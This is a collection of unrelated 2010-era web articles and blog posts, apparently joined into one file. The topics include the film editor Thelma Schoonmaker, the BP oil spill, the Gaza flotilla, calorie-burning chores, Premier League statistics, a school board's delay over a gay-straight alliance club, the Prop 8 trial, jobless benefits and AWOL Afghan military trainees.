I also enjoyed several retro-cuts , which I like to believe were love letters to her fanbase .
I should be a much bigger Scorsese fan , but I have two major problems with his films : depictions of women and the fact most of the time I need a tour guide to alert me of all the eye gouging , menace and gore awaiting me in each scene .
Yes , the latter is definitely a me problem .
That said , I ’ve seen pretty much every Scorsese - Schoonmaker collaboration from Raging Bull onward .
Schoonmaker makes some fierce cuts in 1995 ’s Casino
It should come as no shock that my favorite Scorsese film is Casino — it is where I had the most opportunities to experience Schoonmaker ’s work , which is surprisingly easy to do if your hands are not covering your face .
Schoonmaker , while not as edgy as Dede Allen , is still quite a dazzling editor .
Her choices are also deliberate , but diverge from Allen ’s , as the visual language of their respective directors is much different , despite both having an interest in gritty narratives .
It ’s interesting to note the stylistic decisions Schooner and Allen make when presented with the same story .
A double feature suggestion would be Robert Rossen ’s The Hustler and Scorsese ’s gritty film The Color of Money , which by the way , is the sequel to The Hustler .
Oh yeah , and Mr. Salad Dressing himself , Paul Newman , stars in both !
Any more excuses to avoid them ?
Blogger ’s note :
It ’s not your imagination .
Scorsese does use the Rolling Stones ’ Gimme Shelter in nearly all his trailers !
Thelma Schoonmaker winning Oscars for The Aviator and The Departed
Schoonmaker ’s cuts are credited by Scorsese for catapulting this scene to iconic status
Schoonmaker ’s delightful interview with Fresh Air .
In the late winter of 1990 Schoonmaker ’s husband , the famed British filmmaker Michael Powell — The Red Shoes ( 1948 ) , Black Narcissus — passed away .
Since Powell ’s death , Schoonmaker has dedicated the downtime between cutting Scorsese ’s films to preserve her husband ’s film .
I ’ve seen the restored Criterion Collection version of Black Narcissus and despite the material being quite dated ( Deborah Karr as a nun ) the visuals are still breathtaking .
Schoonmaker is a powerful role model for women in film .
She is opinionated — bombing her State Department test for having the cheek to suggest South African Apartheid was bad , in a time where that really was n’t the done thing — she is principled , and apparently is unafraid to give old “ Marty ” the business while cutting their films .
So much of female contribution in film is either marginalized — as in the case of Kathryn Bigalow — or erased — as in the case of Dede Allen or Darnell Martin — but feminist film buffs have a hero and a trailblazer in the only person on the planet , a woman , Scorsese trusts to make all his gritty , “ tough guy ” films so difficult watch while eating dinner .
Technical mastery is not solely the domain of males , regardless of how females are positioned in Hollywood .
Sometimes it takes a lady film buff editor to make Pesci and De Niro look so bad - ass !
NEW ORLEANS — As officials reported a gradual increase in the amount of oil being captured from the spewing wellhead at the bottom of the Gulf of Mexico , BP said Monday that it plans next month to replace the cap collecting the crude with a slightly bigger device .
The newer cap will “ provide a better , tighter fit ” than the current one collecting roughly one - third to three - fourths of the oil gushing daily from the sea floor , company spokesman Robert Wine told The Associated Press .
But it will also allow the oil now being collected to again spew out into the Gulf during the changeover .
The oil began gushing after a BP PLC oil rig explosion April 20 and recently increased in volume after officials sheared off the top of the damaged outflow pipe as part of the latest containment effort .
BP believes the bigger cap will fit over more of the pipe than the current cap .
The current device is collecting about 466,200 gallons ( 1.7 million litres ) of oil per day , Coast Guard Adm .
Thad Allen , the government ’s point man for the oil spill response , said earlier Monday at the White House .
He also elaborated on comments made over the weekend that the spill cleanup would last into fall , acknowledging the full process would take much longer .
“ Dealing with the oil spill on the surface will take a couple of months , ” he said Monday , but the process of getting oil out of marshlands and other habitats “ will be years . ”
The battle against the oil already in the Gulf now involves many individual patches , Allen said .
Small vessels in the area have been enlisted to help capture those patches using skimmers .
The patchy oil slick from the ruptured pipe off Louisiana has stained beaches and marshes in spots along more than 100 miles ( 160 kilometres ) of coast from Louisiana to the Florida Panhandle , and a sheen on the surface was spotted as far as about 150 miles ( 240 kilometres ) west of Tampa , Florida .
Tar balls continued to roll onto shore Monday morning farther west at Pensacola Beach , Florida , leaving a line in the sand visible from the high - rise condos above as the sun rose .
Beach walkers had to stay between the line of dime - and quarter - size tar balls and the retreating surf or risk getting the gummy , rust - staining gunk stuck to their feet .
At Barataria Bay , Louisiana , just west of the mouth of the Mississippi River , large patches of oil the consistency of pancake batter in the still waters Monday .
A dead sea turtle caked in brownish - red oil lay splayed out with dragonflies buzzing by .
The Barataria estuary , which has become one of the hardest - hit areas , was busy with shrimp boats skimming up oil and officials in boats and helicopters patrolling the islands and bays to assess the state of wildlife and the movement of oil .
On remote islands , oil visibly tainted pelicans , gulls , terns and herons .
President Barack Obama sought to reassure Americans on Monday by saying that “ we will get through this crisis ” but that it would take dedication .
“ This will be contained , ” Obama said .
“ It may take some time , and it ’s going to take a whole lot of effort .
There is going to be damage done to the Gulf Coast , and there is going to be economic damages that we ’ve got to make sure BP is responsible for and compensates people for . ”
Among those people are Gulf Coast residents who make their living by fishing or operating tourist traps along the region ’s white - sand beaches .
Allen said Monday that BP needs to make improvements on getting money to individuals and businesses harmed by the spill .
“ It ’s not a core competency of BP so we ’re trying to get them some help , ” Allen said .
Wine said the estimate of the proportion of gushing oil being collected is based on the government ’s contention that the containment cap is collecting 466,200 gallons ( 1.7 million litres ) of oil of the roughly 604,800 to 1,260,000 gallons ( 2.2 million to 4.7 million litres ) it believes is coming out daily .
Cutting the riser likely increased the flow of oil by 20 per cent from the 504,000 to 1,050,000 gallons ( 1.9 million to 3.9 million litres ) the government contends was coming out previously , Wine said .
Wine acknowledged the frustration people must have when they look at the undersea video feeds that show billows of oil still flowing into the sea .
“ We want to capture every drop of oil that is still leaking , ” he said .
“ We want to protect the coastline and repair the coastline that has been damaged . ”
Officials say the current cap is collecting more than 460,000 gallons ( 1.7 million litres ) of oil per day .
BP continues to drill relief wells in hopes of a permanent solution .
Israel steps up its warmongering
By Chris Marsden
1 June 2010
Israel ’s action against the Gaza aid flotilla is in line with its increasingly bellicose stance on all fronts .
Coinciding with last week ’s air raid on Gaza , Israel conducted its biggest ever annual war drill .
The army , security and rescue services ended their five day military exercises with a mass mobilisation of Israeli citizens who were required to dash to bunkers and safe rooms across the country in response to a simulated missile attack .
The exercise prompted accusations from Lebanon and Syria of warmongering by Israel , which is attempting to pick off Iran ’s allies in the region .
Israel has for some weeks been threatening its northern neighbours , following claims by Tel Aviv and Washington that Syria has been shipping long - range Scud missiles to Hezbollah in Lebanon which is supported by both Iran and Syria .
Such missiles could reach Israel ’s southern towns and cities .
Syria and Lebanon have denied Israel ’s accusation .
Hezbollah has , however , rearmed extensively since Israel ’s war on Lebanon in 2006 that devastated the country ’s infrastructure without achieving its political and military objective , the eradication of Hezbollah .
The Islamist movement is believed to have at least 40,000 missiles and rockets , some of which are capable of reaching Tel Aviv , the Dimona nuclear reactor in the Negev desert , and Ben Gurion International airport .
It has bases , complete with bunkers , tunnels and lookout points , in southern Lebanon .
On Sunday , Israeli war planes carried out mock air raids over southern Lebanese villages , flying at medium altitude over Nabatiyeh , Khiam and Marjayoun .
Israeli MK surveillance drones also violated Lebanese airspace over villages and towns in the area of Nabatiyeh .
Last week , according to the Daily Star , Lebanese anti-aircraft guns opened fire on two Israeli warplanes .
On Saturday , Israeli Foreign Minister Danny Ayalon had directly threatened Lebanon ’s Prime Minister Saad Hariri , warning that he “ will pay a high price in the event of a new war . ”
“ We have deterrence and an attack force , and if we retaliated on such an aggression , we wo n’t distinguish between the Lebanese Cabinet and Hezbollah , ” said Ayalon .
Earlier this year , Israel deployed troops along its northern border with Lebanon , hinting at a military operation later this year .
In April , Ehud Barak , Israel ’s Defence Minister , made clear during his visit to Washington that Israel would hold the government of Lebanon “ accountable ” should tensions between Israel and Hezbollah escalate into hostilities .
Hariri is opposed to Hezbollah , but the fractured state of Lebanese politics has forced him into a coalition with it .
America is desirous of some kind of agreement between Israel and the Palestinians that will help smooth the way for Arab backing of its hostilities directed against Iran .
But whatever difficulties there are in diplomatic relations as a result , Washington continues to finance Tel Aviv ’s warmongering .
A few weeks ago , the Obama White House announced it would seek an additional $ 205 million in military aid for Israel from Congress to support Israel ’s “ Iron Dome ” , a rocket - shield system designed to protect Israel against short - range rockets fired into Israel by Hamas and Hezbollah .
While the Iron Dome was originally expected to be deployed in Israel ’s southern towns as protection against rockets from Gaza , it is ineffective against short - range missiles .
Israeli officials indicated that they were thinking of placing it against Lebanon .
The Sunday Times this week also contained an exclusive report on Israel ’s decision to deploy three German - built submarines equipped with nuclear - armed cruise missiles in the Gulf near the Iranian coastline , the day after Tel Aviv rejected a new United Nations call to detail its secretive nuclear program .
Israel declared late Saturday that it would not take part in a 2012 conference on establishing a nuclear - free Middle East .
The conference was formally endorsed by the United States and the 188 other signatories to the Nuclear Non-Proliferation Treaty , with Washington keen to exploit an opportunity to condemn Iran over its alleged nuclear weapons programme .
The US was clearly embarrassed by Israel ’s hard - line stance , with Tel Aviv calling the conference resolution a “ deeply flawed and hypocritical ” act that ignores the threat posed by Iran .
The Arab proposal for a Middle East free of nuclear weapons was first endorsed internationally as long ago as 1995 , but never acted upon .
US National Security Adviser Gen. James
Jones supported the call for compliance with arms control and non-proliferation obligations as “ essential precursors ” of a nuclear - free Middle East .
But he held out an olive branch to Tel Aviv by criticising the resolution 's decision to single out Israel while failing to mention Iran .
He declared Iran the greatest threat of nuclear proliferation in the region .
Israel is not a signatory to the non-proliferation treaty .
The Sunday Times reported that the first nuclear submarine has already been sent , supposedly in response to fears that ballistic missiles developed by Iran , Syria and Hezbollah could hit sites in Israel .
All three submarines of Flotilla 7 — Dolphin , Tekuma and Leviathan — have been despatched to the Persian Gulf before , but are now to be permanently stationed there on a rotating basis .
“ The vessels can remain at sea for about 50 days and stay submerged up to 1,150 ft below the surface for at least a week .
Some of the cruise missiles are equipped with the most advanced nuclear warheads in the Israeli arsenal , ” the Times wrote .
Pin 1 Shares
One of the things I ’ve been struggling with is losing 10 pesky pounds that never seem to exactly go away .
My personal trainer is encouraging me to find more ways to burn a few extra calories during the day , conceding that it ’s really , really hard ( especially with summer starting and my son home ) for me to find a dedicated 40 minute block of time each to work out .
It does n’t help that , with the notable exception of swimming — which I ca n’t do each day , I hate exercise .
I ’m a playing outside sort of person , and I have other interests , so my trainer suggested a few things that I can do each day to burn calories .
After a little tooling around on the Internet , I found a calculator on About.com that helps you determine how many calories are burned with each activity .
Most of the calorie counts come from that .
It is important to note that these estimates are based on my weight ( which I ’m not going to share here ) , and actual calories burned by you depends on your weight , metabolism and other factors .
Take the stairs :
This one is obvious , and you ’ve heard it several times .
But it ’s still effective .
My trainer says that since I work from home , I should take a few breaks a day , when I rest my eyes from looking at the computer , or get lunch , and take five minutes to go up and down the stairs .
For 10 minutes of stair climbing , you can consume 92 calories .
Shopping :
This may not be good for your pocketbook , but How Stuff Works points out that you can use up to 243 calories an hour just by pushing a shopping cart around .
Try not to get too carried away buying things , and focus on healthy food choices .
Mow the lawn :
Get off the riding mower and push the mower around .
If you mow for 30 minutes , you can burn 147 calories .
You can burn the same amount of calories gardening , while enjoying the fresh air .
If you are digging in the garden , you ’ll burn even more .
Laundry : Concentrate on what you are doing as you do the laundry , and consider folding clothes standing up .
How Stuff
Works says that you can burn 72 calories when you fold clothes for 30 minutes , and that ironing can burn off 76.5 calories in half an hour .
Music practice : I was really excited that this was an option .
My trainer said that practicing music can be a way to get things going .
Playing the piano burns 85 calories in 30 minutes , according to the About.com calculator .
Playing my guitar should also burn a few calories .
Housecleaning :
Not that I like housecleaning any better than exercise , but apparently it can be a good way to burn a few extra calories : 196 for 30 minutes of vacuuming , scrubbing and other similar chores .
Family game night :
My trainer suggests a fun game night with the family .
Even a board game can help burn a few calories , since playing cards can burn 159 calories if you play for 90 minutes .
You just have to be able to avoid snacks while playing .
Prepare dinner :
Take some time to prepare your dinner .
Of course , you ’ll have to make healthy dinners rather than high calorie dinners , since How Stuff Works points out you ’ll only burn 74 calories during 30 minutes of meal prep .
Wash the car : Clean your own car , instead of going to the car wash .
You ’ll burn close to 277 calories after an hour , and you could save money since you are n’t paying for someone else to do it .
Toss the Frisbee :
You can play with your kids and burn calories .
Instead of just watch your kids , actually play with them .
Frisbee toss can burn 98 calories in 30 minutes .
Imagine how much you could burn if you played something even more active with your kids !
Of course , it is important to realize that just doing these activities wo n’t lead to 10 pounds of weight loss .
I still need to exercise 20 to 30 minutes most days .
The point of this list is to help me find some more “ fun ” ( or at least bearable ) activities that I can do to increase the number of calories I burn in a day , in chunks of as little as five minutes .
Subscribe Now
You will receive all updates in your feed reader as soon as they are posted .
Very Convenient !
Great to see you again !
Already have our Feed ?
Like us on Facebook and Follow us on Twitter for more updates
Jun 2 2010
Neve Gordon | The Nation
June 1 , 2010 .
â€ œWhy didnâ€™t they greet us with muffins and orange juice ? â€ was my friendâ€™s facetious question after listening all morning to the Israeli mediaâ€™s coverage of the assault on the relief flotilla heading for Gaza , the navy assault that left nine citizens dead and many more wounded .
Like a group of pirates in the Mediterranean , the Israeli navy attacked humanitarian aid ships in international waters , and yet Israeli officials and commentators were totally surprised when the passengers did not receive them with open arms .
Going through the talkbacks on news sites , it seems that most Jews in Israel were also taken aback .
Later in the day , Foreign Minister Avigdor Lieberman held a press conference , in which he made two revealing declarations .
First , he asserted that no country would allow a foreign entity to threaten its sovereign borders .
This claim , however , reveals the basic lie regarding Israelâ€™s Gaza policy .
Israel has to decide once and for all whether or not it withdrew from Gaza in August 2005 .
If it did and Gaza is an autonomous entity as Israel claims , then the attempt on the part of these humanitarian ships to reach the Gaza sea port is not an infringement on Israeli sovereignty .
If , on the other hand , Israel considers the flotillaâ€™s entrance into Gazaâ€™s territorial sea line as a violation of its own sovereign borders , then Israel needs to admit that it has never given up its sovereignty over Gaza .
Liebermanâ€™s statement discloses , in other words , that Israel has fashioned itself as a unique creature in the international arena : the non-sovereign sovereign .
When it suits its interests , the government claims that it has relinquished sovereignty over Gaza , but when it does not , the government reasserts its sovereignty .
Lieberman should keep in mind that with sovereignty comes responsibility .
Thus , if Israel was indeed defending its borders yesterday morning then as sovereign , Israel is also responsible for the Palestinian people in the Gaza Strip–for their livelihood as well as their security .
Liebermanâ€™s second declaration was that the Israeli military is the most moral in the world .
No other soldiers , he said , would have dealt in such a forgiving way with the people on board the ships .
Lieberman conveniently ignored the fact that according to international law the Israeli soldiers were acting like pirates , since hijacking an unarmed humanitarian aid ship in international waters is by definition piracy .
Moreover , his second observation is informed by the lesser evil argument ; namely , the Israeli military could have been more brutal and chose not to .
As the great Jewish philosopher Hannah Arendt pointed out , “ Politically , the weakness of the argument [ for lesser evils ] has always been that those who choose the lesser evil forget very quickly that they chose evil . ”
Amid all the chinwagging and finger - pointing this week about assorted inclusions and exclusions in England 's pre-World Cup squad , one man whose non-selection has provoked no controversy whatsoever is the Bolton striker Kevin Davies .
But why ?
The barrel - chested 33 - year - old has long been recognised as one of the most effective targetmen in the Premier League yet Fabio Capello , like his predecessors , has never considered him worthy of even a run -out at a training session .
Rummage through the data bases of those fine people from Opta statistics and the reason becomes obvious .
This season Davies committed more fouls than any other player in the Premier League – again .
This is the sixth time in the past seven seasons that he has topped that particular poll , which is really quite impressive .
Aston Villa's John Carew managed to interrupt his dominance two years ago but Davies responded to that affront in emphatic fashion – his tally of 121 fouls this season is the highest in the history of Opta records .
Way to push for a World Cup spot !
In his defence , Davies could point to the fact that he is also the victim of many fouls – only Everton 's Steven Pienaar was more roughed up than him this season – but the fact remains that Davies 's propensity for conceding free - kicks would make him a liability on the international stage .
Stats do not , of course , provide a full understanding of performances .
But poring over Opta 's cornucopia of end - of - season figures is , for those of us of an unashamedly geeky disposition , one of the great pleasures of May .
Who can fail to be intrigued , for example , by the rankings for chance creation ?
The fact that Arsenal 's Cesc Fábregas generated opportunities more frequently than any other player ( every 23.1 minutes , apparently ) will shock no one , but who is that at No7 in the overall list – behind Ryan Giggs , Florent Malouda , Frank Lampard , Salomon Kalou and Antonio Valencia ?
Why it 's the celebrated Wolves schemer Chris Iwelumo !
Sure , he did it over a briefer period than many others but only players who created more than 10 chances are eligible for inclusion in the list and the burly Scot forged an opening every 29.6 minutes , a better rate than Robin van Persie ( 30.6 ) , Nani ( 31.1 ) and , yes , Wigan 's Hendry Thomas ( 212.5 ) .
The stats also help answer a question that many at Liverpool have long been asking : what is Lucas Leiva for ?
The much - maligned Brazilian put in more tackles ( 148 , winning 102 ) this season than all but three other players in the league – though the most prolific tackler remains his team - mate , Javier Mascherano ( 178 , of which he won 144 ) , ahead of Mohamed Diamé of Wigan ( 176 , won 125 ) and Fabrice Muamba of Bolton ( 152 , won 102 ) .
There are four Liverpool players in the top 30 most frequent tacklers – more than any other team .
Arsenal have only one – Alexandre Song is 23rd , having attempted 88 tackles , one fewer than Birmingham 's James McFadden .
You might deduce that this is because Arsenal did not need to tackle as much since they tended to have the ball a lot – and it is true that only Chelsea averaged more possession in matches ( 59.8 % to Arsenal 's 59.3 % ) .
But Liverpool averaged 59.1 % .
They may have had the ball at their feet quite a bit , but Liverpool also had their heads in their hands a lot – they were denied by the frame of the goal more times ( 20 ) than any other team this season .
One of the starkest trends in the Premier League in recent years has been the increasing importance of set - pieces – the proportion of goals originating from them has leapt by over 7 % in the last five years , reaching 36.66 % this season .
That pattern is perhaps what has convinced Arsène Wenger finally to declare that he will address his team 's defensive problems : Arsenal 's organisational problems at the back , exacerbated by the lack of a commanding goalkeeper , were reflected in the number of goals they conceded from set - pieces , 23 – only the three relegated sides and Wigan let in more .
Perhaps Wenger should turn this summer to Birmingham 's Roger Johnson , who made more clearances ( 440 ) than any other player in the division this season ( Zat Knight was next with 434 before a big gap until you reach Sylvain Distin , 388 ) .
The main factor in the climb in set - piece goals has been greater accuracy from corners and throw - ins .
Last season 11.89 % of goals came from corners ; this season that figure rose to 13.58 % .
Manchester City were most dangerous from corners this term , scoring 15 goals ( Blackburn were next , with 12 ) .
The proportion of goals from throw -ins , meanwhile , has doubled in the last two years – from 1.5 % in 2007 - 08 to 2.94 % this season .
The obvious conclusion to draw from that is that the figures have been distorted by Stoke .
But while it is true that Tony Pulis 's troops flung in far more long throws this season than any other team ( 608 – Wigan were next with 459 ) , they are not the most lethal from them .
Their throw - ins led to five goals this season , whereas Bolton scored from six ( Grétar Steinsson did n't score any of them , alas – in fact , he had more shots without hitting the target than any other player in the league ) .
If you had never seen Stoke play , you could quickly ascertain their style from a look at the stats – snobs may say that is the most entertaining way to watch them .
They averaged far less possession per match than any other team ( 39.6 % ) , made fewer passes ( 10,314 , compared to Manchester United 's 19,327 ) , mustered fewer shots , and hit a higher percentage of their passes long than anyone else ( 21.12 % ) .
But Stoke finished well clear of trouble because what they do , they do well : they were , for example , the most accurate crossers in the league ( 26.76 % completion rate when corners are included , just ahead of Chelsea and Aston Villa and way in front of the league 's least accurate crossers – Arsenal , on 17.49 % ) .
Bolton , of course , also like to hit long balls , mostly to our friend Davies .
But Owen Coyle has been gradually altering their approach .
Before Coyle 's arrival in January , they used to resort to long balls even more than Stoke – hitting 22.22 % long .
Coyle brought that rate down to 18.19 % .
Over the first 18 matches of the season they averaged 41.48 % possession ; over the 20 league games with Coyle that figure increased to 44.35 % .
And that change was not at the cost of physicality , since under Coyle Bolton won 58.49 % of duels , compared with 56.58 % under Gary Megson .
Elsewhere , Martin O'Neill 's reluctance to rotate his squad as much as many supporters would have liked drew much criticism and was blamed for contributing to Aston Villa 's decline towards the end of the season .
Not only was O'Neill disinclined to rotate , he did not even like making substitutions – he made only 67 in the league during this campaign , far fewer than anyone else ( neighbour Alex McLeish was the next most conservative , making 84 at Birmingham ) .
Blackburn 's Sam Allardyce made the most with 110 .
O'Neill , though , was right to show faith in some players .
Ashley Young delivered far more crosses than any other player ( 272 – the next most prolific was Leighton Baines , with 210 ) .
Gabriel Agbonlahor , meanwhile , was the most accurate shot - maker in the league : 64.29 % of his 56 shots were on target .
Nicolas Anelka ran him close with 63.89 % from 72 – and the Frenchman was exceptionally accurate from outside the area , with bang on 60 % of his efforts finding the target .
Only Damien Duff was better from long range ( 69.57 % of shots from outside the area on target ) – no one else came close .
Indeed , Tottenham fans may have found the new Stefan Freund : a meagre 17.4 % of Luka Modric 's shots from outside the box were on target .
Finally , some hope for Cardiff and Blackpool as they prepare to do battle for the right to compete in the Premier League next season : this year 31 points would have been enough to secure survival , the lowest total .
In fact , there is rarely any need to reach the mythical 40 - point mark : only once in the last 12 seasons would 39 points not have been sufficient ( in 2003 , when West Ham went down with 42 ) , and usually 35 will do .
School Board stumbled over a routine approval to reinstate its high school
club after the board ’s newest members questioned the club ’s application .
Board member Pamela Long asked if the club had a clear academic purpose .
But others said that clubs do n’t need to be strictly academic .
“ We do have clubs like the Frisbee club , ” district business manager Michael Willis said during Monday night ’s meeting .
But does the club ’s philosophy matter ?
Long asked .
“ So like if a Nazi club wanted to come ... , ” she said .
A federal law prohibits schools with other noncurricular clubs from discriminating against gay student clubs .
Long also asked about the club ’s name .
The proposed name is listed as “ Gay - Straight Alliance ( GSA ) ” on one part of the application and “ Cumberland Valley GLBTSA ( Gay Lesbian Bi Trans Straight Alliance ) ” in another part .
GLBT and LGBT are terms used interchangeably refer to people who identify as gay , lesbian , bisexual or transgender .
Board member Barbara Gleim asked if board approval meant approving all the activities outlined in the club application , specifically , the “ pink prom ” a proposed dance for same - sex couples .
“ If we approve that , then anybody could have their own prom at the high school , ” she said .
Ultimately , approval for the club was postponed until the board ’s June 17 meeting .
Long initiated the motion to table the request .
All but two board members voted to postpone the vote .
“ My feeling is eventually , we ’re going to approve , so let ’s go ahead and approve it , ” John Jordan , one of the members who voted against postponing , said in an interview .
Jordan said he does n’t endorse or oppose the Gay - Straight Alliance specifically but thinks that all clubs that meet the school ’s guidelines should be allowed to form .
Bill DeVore , who also voted against postponing , expressed a similar view .
“ According to the guidelines , they have as much a right as the chess club or the Frisbee club or any other club , ” he said .
Jordan , at the meeting , asked Solicitor Michael Cassidy what might happen if the board did not approve the application .
Lawsuits and a public relations nightmare , Cassidy said .
“ He ’s absolutely right .
They would be .
And conversations with the ACLU can be expensive , ” said Mary Catherine Roper , staff attorney with ACLU of Pennsylvania .
“ School board members are n’t usually education experts .
They do n’t always know school law .
We ’d have the expectation that they ’re going to make the legal decision in this case , which is to approve the club , ” Roper said .
Cumberland Valley had a GSA club , but it disbanded several years ago when the students who were most involved graduated .
In a separate interview , Long defended her motion to table the vote .
She had additional questions beyond what was in the application , she said .
For example , would the club be part of a larger organization , which would require a charter and possibly dues ?
She declined to comment whether she would support a Gay - Straight Alliance club at Cumberland Valley .
Nick Clark , a student representative to the school board , said he found Long ’s objections to be nitpicking .
“ She kept bringing up these little details that had nothing to do with the club itself , ” he said .
Clark said he suspected the board would approve the club at the next meeting but saw little reason to postpone the vote .
“ It ’s just frustrating and a little bit annoying that they would table something because of the semantics of the application , ” he said .
Cumberland Valley ’s board sanctioned the GSA club in 2007 without fanfare .
Even if it were legal to turn down the application , doing so would be bad idea , said Shannon Powers , spokeswoman for the Pennsylvania Human Relations Commission .
“ You would be further alienating a group that is already alienated .
They ’re rejected by so many and maybe even their parents .
They need the support of one another and administrators who might have a positive attitude toward them , ” she said .
Twenty high schools in the area have similar clubs , including Carlisle Area , Central Dauphin , Central Dauphin East , Cedar Cliff in the West Shore School District , Cedar Crest in the Cornwall - Lebanon School District , Lebanon , Lower Dauphin , Palmyra Area and Shippensburg Area .
But Waynesboro Area School
Board last year tabled a request for a gay - straight club after some board and community members opposed it .
Ultimately , the board voted 6 - 3 to approve a club .
Alyssa Nestler , who will be a senior next year , is trying to revive Cumberland Valley ’s club to help students who are dealing with the same challenges she ’s gone through .
Nestler said she began to realize she was a lesbian at the beginning of high school .
She met her first girlfriend in 10th grade .
“ It was kind of a scary experience for us , ” she said during an interview Tuesday .
“ See , at that time , we ’d only heard scary stories about the gay community .
Nobody really talked about being gay and doing other things . ”
There were a lot of unanswered questions .
How would her parents react when she came out to them ?
What would her friends think ?
How would she be treated at school ?
Would she be able to live a normal life or would she face discrimination around every corner ?
A school club , Nestler said , would give young people who realize they are gay , lesbian or bisexual a place to find people with similar experiences who they could to turn to .
“ I ’d like to make it so kids do n’t have to worry about that , ” Nestler said .
“ You can be gay and be just fine . ”
Putting an end to harassment from other students also would be a major focus , she said .
“ It ’s not unordinary to walk through the halls and hear : ' Hey , faggot , ' ” said Kyla Kauffman , another student who ’s working to revive the club .
“ We ’re hoping with GSA to abolish that . ”
There was some hope that closing arguments in the Prop 8 case , scheduled to take place June 16 , would be televised .
Not going to happen :
" Chief U.S. District Judge Vaughn Walker issued a brief order Thursday denying a request by media organizations to televise the arguments , scheduled to last all day Wednesday in San Francisco .
The organizations included Hearst Corp. , which owns The Chronicle .
The denial means ' the public will again only hear about this case second - hand , ' said Thomas Burke , the media groups ' lawyer .
Andrew Pugno , a lawyer for sponsors of the ballot measure that banned same - sex marriage , countered that ' the purpose of the court is not to entertain or educate the public , but to protect the right to a fair and impartial trial . '
The sponsors had opposed televising any trial proceedings . "
FireDogLake reports on a conference call regarding closing arguments held yesterday by the Olson and Boies team .
Said Boies : " Boycotting a trial almost never a winning strategy .
They identified 8 experts .
What happened is that their experts broke down , either at deposition or at trial .
They tried to come up with the evidence , they knew they were required to come up with evidence .
They tried to build that trial record and they simply failed .
They did n’t fail because they ’re bad lawyers , they failed because there is n’t any evidence to support the argument they ’re advocating . "
AFER has posted the entire press call online .
You can listen to it , HERE .
Chuck Grassley reiterates that the GOP would be fine with extending jobless benefits , as long as they are paid for with already appropriated stimulus funds .
“ Ninety percent of the bill is n’t controversial , ” Grassley said , concluding that the big problem is that he and many other lawmakers do n’t want to add to the federal deficit .
He chided Democrats for refusing to pay fully for the legislation with offsetting savings , revenue increases or the remaining federal stimulus funds .
Even though Democrats repeatedly cut the bill in an effort to win Republican backing , the latest version would have added $ 55 billion to the nation ’s $ 1.4 trillion deficit over 10 years , according to the Congressional Budget Office .
Grassley said he ’s heard from his constituents that they are tired of the government running up huge debt , and that the message is starting to get through to Democrats as well .
“ It was n’t just Republicans who voted against the bill in the U.S. House , ” he said .
“ There were plenty of Blue Dog Democrats who do n’t agree with this type of spending either . ”
There are two basic problems with that .
First , jobless benefits have always been passed as emergency funding , in every Congress under every administration since the program was created .
But , second , with states in dire crisis and stimulus funds already drying up , what 's left of that money needs to be used for the purpose it was intended : creating new jobs .
Republicans are holding the economy hostage , with the enabling of Ben Nelson , who 's bored with hearing about the jobless .
[ A ]s Sen . Debbie Stabenow told reporters yesterday afternoon , the same should 've applied to the current jobs bill : " 15 million people unemployed , " she stressed , " is an emergency . "
Not so , according to Ben Nelson .
" I do n’t buy that distinction , " Nelson said yesterday .
" At some point , it ceases to be an emergency .
It 's ongoing ... I think the bill should be paid for . "
Republicans have a political reason to keep the economy in the dumps -- they want to use it for political gain .
They can read polls , they know that unemployment and jobs continues to remain the primary concern of the majority of Americans .
And Ben Nelson 's boredom is giving them that political advantage .
A nationwide alert has been issued for 17 members of the Afghan military who have gone AWOL from an Air Force base in Texas where foreign military officers who are training to become pilots are taught English , FoxNews.com has learned .
The Afghan officers and enlisted men have security badges that give them access to secure U.S. defense installations , according to the lookout bulletin , " Afghan Military Deserters in CONUS [ Continental U.S. ] , " written by Naval Criminal Investigative Service in Dallas and obtained by FoxNews.com .
The Be - On - the - Lookout ( BOLO ) bulletin was distributed to local and federal law enforcement officials on Wednesday night .
The Afghans were attending the Defense Language Institute at Lackland Air Force Base in Texas .
The DLI program teaches English to military pilot candidates and other air force prospects from foreign countries allied with the U.S .
" I can confirm that 17 have gone missing from the Defense Language Institute , " said Gary Emery , Chief of Public Affairs , 37th Training Wing , at Lackland AFB .
" They disappeared over the course of the last two years , and none in the last three months . "
The most recent Afghan to disappear from Lackland was First Lt. Javed Aryan , who went AWOL in January 2010 , Emery told FoxNews.com .
The others listed in the NCIS report disappeared at various times last year .
Each of the missing Afghans was issued a Department of Defense Common Access Card , an identification card used to gain access to secure military installations , with which they " could attempt to enter DOD installations , " according to the bulletin .
Base security officers were encouraged to disseminate the bulletin to their personnel .
" The visas issued to these personnel have been revoked , or are in the process of being revoked .
Lookouts have been placed in TECS , " it reads .
Treasury Enforcement Communications System ( TECS ) , which is shared by federal , state and local law enforcement agencies , is a computer - based database used to identify people suspected of violating federal law .
Afghans are not the only foreign military who have gone AWOL from Lackland , Emery said .
" In 2009 , the Defense Language Institute English Language Center reported two other students from countries other than Afghanistan went missing , " he told FoxNews.com .
" They include one Iraqi who requested asylum in Houston and one Djiboutian whose status is unknown .
To date in 2010 , one student from Tunisia and one from Guinea Bissau have gone AWOL in addition to the Afghani student [ Aryan ] who went AWOL in January .
" To put these numbers in perspective , " Emery said , " more than 3,400 international students entered training at DLI in 2009 , including 228 from Afghanistan . "
A senior law enforcement official said Friday that the Afghans ' disappearance was more of an immigration violation than a security threat , saying there are no " strong indications to any terrorism nexus or impending threat . "
The official further said that an unspecified number of the 17 have been caught .
" A number of these guys have already been located or accounted for by now , " the official said .
" Some are in removal proceedings to be deported already .
( Authorities ) still need to locate the others , and that is why the bulletin went out . "
The official said the information is " kind of old " -- up to two years -- but added , " It is important in the sense that some people look to come to the U.S. and will take advantage of invitations to train or attend a conference or to study , etc .
But their real intention is to get to the U.S. and start a new life .
It is not completely rare for this to happen ....
" Although we are vigilant and need to work toward not allowing this to happen , " the official said , this alert should " not necessarily " be described as " a national security threat , more of a ' hey these guys violated our laws and we need to find them . ' "
Included in the bulletin are photos of the 17 men , accompanied by their dates of birth and their TECS Lookout numbers .
Click here for the names of the 17 Afghan military members named in the alert .
The bulletin requests , " If any Afghan pictured herein is encountered , detain the subject and contact your local Immigration and Customs Enforcement ( ICE ) office , the FBI or NCIS . "
" When a DLI student goes missing , " Emery said , " officials report the incident to the Department of Homeland Security 's Immigration and Customs Enforcement as well as the sponsoring service branch .
Invitational Travel Orders , passports , driver licenses , and airline tickets are revoked in order to hamper travel opportunities for the missing students . "
The FBI and NCIS did not respond to requests for comment .
A Department of Homeland Security spokesman referred FoxNews.com to the FBI .
While police in the midstate have n’t run out of bullets , a nationwide ammunition shortage is causing headaches as departments try to ensure they have enough for training and patrols .
